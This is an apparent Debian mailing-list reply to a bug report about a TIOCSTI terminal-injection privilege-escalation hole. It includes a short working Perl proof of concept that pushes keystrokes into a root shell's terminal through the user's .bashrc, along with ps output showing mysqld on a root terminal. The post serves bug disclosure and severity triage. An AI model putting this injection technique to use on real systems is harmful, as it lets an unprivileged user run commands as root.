Re: Bug#357561: privilege escalation hole
Daniel Leidert <daniel.leidert@wgdd.de> writes:
> Didn't know that special treating of terminal exploits.
Nor did I. Does anyone have a pointer to a discussion of this? I
assume it must have been discussed a few times already.
As a dumb user, I wasn't aware of the possibilities TIOCSTI gives you.
It was very interesting to see the effect of calling this perl script
from ~luser/.bashrc and then do "su luser" in a root shell:
#!/usr/bin/perl
require "sys/ioctl.ph";
open(TTY, '/dev/tty');
foreach (split(//,"exit\nid\n")) {
ioctl(TTY, TIOCSTI(), $_);
}
I think I'll stop using su now ;-)
BTW, I noticed that mysql-server-5.0 also has a problem similar to
apache. This is the ps output after a recent "apt-get upgrade":
root 8458 0.0 0.0 3912 904 pts/3 S Feb28 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 8495 0.0 0.3 126524 3780 pts/3 Sl Feb28 0:00 \_ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --ski
root 8496 0.0 0.0 2968 356 pts/3 S Feb28 0:00 \_ logger -p daemon.err -t mysqld_safe -i -t mysqld
Does the special treating of terminal exploits mean that this is not a
bug? Or should it be reported with a low severity? As opposed to
apache, normal users rarely have access to run their own code in mysql
context anyway, so exploitng this may be difficult.
Bjørn
--
Italian people are all satanic DAF drivers, huh? So, people are dying
every day?
Reply to: